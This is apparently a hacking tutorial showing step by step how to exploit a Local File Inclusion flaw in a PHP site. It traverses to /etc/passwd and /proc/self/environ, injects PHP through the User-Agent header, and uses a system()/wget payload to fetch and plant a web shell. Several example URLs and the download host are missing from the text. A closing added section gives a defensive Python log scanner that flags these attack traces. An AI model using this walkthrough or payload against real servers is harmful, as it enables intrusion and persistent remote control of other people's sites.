Amir Roknifard
Amir Roknifard is a cyber security professional with years of professional experience and a proven track record in cyber security management and risk consulting, helping boards to better manage their cyber risk and transform their cyber security practices. He is the founder of Academician Journal, which aims to close the gap between academia and the InfoSec industry. He has also authored and reviewed books, published articles, and developed a master's degree program in cyber security.

File Inclusion Attack

File inclusion is a vulnerability that allows an attacker to access unauthorised files on a web server and to execute malicious code by abusing the 'include' functionality. Local file inclusion (LFI) is the inclusion of a local file that is available on the web server. The vulnerability occurs when user input contains the path of the file that is to be included. When this input is not properly sanitised, an attacker can supply the locations of default files and access these sensitive files.

Let's suppose this website is vulnerable to a local file inclusion attack:

Now let's replace contact.php with ../ and try the new URL:

After requesting this page we get an error. There is a good chance that the site has a Local File Inclusion vulnerability.

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/roknifard/public_html/ on
line 1337

Now let's check for etc/passwd to see if the site is vulnerable to Local File Inclusion:

We get an error, so now we include more directories to look for the etc/passwd file.

If you get a page like the following, you have successfully included the /etc/passwd file.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

We have successfully included a file, and our next step is to include the proc/self/environ file. So now replace /etc/passwd with /proc/self/environ.

If you get something like the following, you have successfully included the proc/self/environ file.

DOCUMENT_ROOT=/home/roknifard/public_html GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 
on SCRIPT_FILENAME=/home/roknifard/public_html/index.php SCRIPT_NAME=/index.php
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/ Server at Port 80

proc/self/environ is accessible. If you get a blank page or an error, proc/self/environ is not accessible or the OS is FreeBSD.

Now let's inject our malicious code into proc/self/environ. We can inject our code through the User-Agent HTTP header. Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and re-request the URL.

Now tamper this page: add your uploader script to the User-Agent and then submit. You will get an uploader on the /proc/self/environ page; just browse and upload your shell.

You can also upload your shell by downloading it remotely using the wget command.

<?system('wget -O shell.php');?>

Add this command to the User-Agent and request the page. The command is executed through system(): it downloads the .txt shell and saves it as shell.php in the website directory, and our shell is created. If it didn't work, try exec(), because system() can be disabled on the web server in php.ini.

Now let's check whether our malicious code was successfully injected by checking if the shell is present.

Our shell is there. Injection was successful.
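
From the defender's side, every step of the walkthrough above leaves a trace in the web server's access log, and because the User-Agent is reflected into /proc/self/environ, the include request and the PHP code arrive in the same request. The following is an added example, not part of the original article, that flags those traces in combined-format log lines; the sample lines, the index.php script and the `page` parameter name are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>.*)"$'
)

def decode(value, rounds=2):
    """Percent-decode repeatedly so encoded forms are matched as well."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(line):
    """Return the set of LFI indicators found in one access-log line."""
    m = LOG_RE.match(line)
    if m is None:
        return set()
    query = decode(m["target"].partition("?")[2]).replace("\\", "/")
    agent = decode(m["agent"])
    found = set()
    if "../" in query:
        found.add("traversal")
    if "etc/passwd" in query:
        found.add("passwd")
    if "proc/self/environ" in query:
        found.add("environ")
    if "<?" in agent:
        found.add("php-in-agent")
    # An environ include with PHP in the User-Agent is the step where a file
    # read becomes code execution; 200 means it was served, not blocked.
    if {"environ", "php-in-agent"} <= found and m["status"] == "200":
        found.add("CRITICAL")
    return found

# Constructed sample lines; script name and "page" parameter are assumptions.
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=../ HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=../../../etc/passwd HTTP/1.1" 200 1400 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:00:20 +0000] "GET /index.php?page=../../../proc/self/environ HTTP/1.1" 200 900 "-" "<?php echo 1; ?>"',
]

def scan(lines):
    """Map each flagged line number (1-based) to its sorted indicators."""
    return {i: sorted(f) for i, line in enumerate(lines, 1) if (f := classify(line))}

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE).items():
        print(lineno, hits)
```

A line tagged CRITICAL warrants checking the web root for files created after that timestamp; the other tags indicate probing that the include's input validation should have rejected.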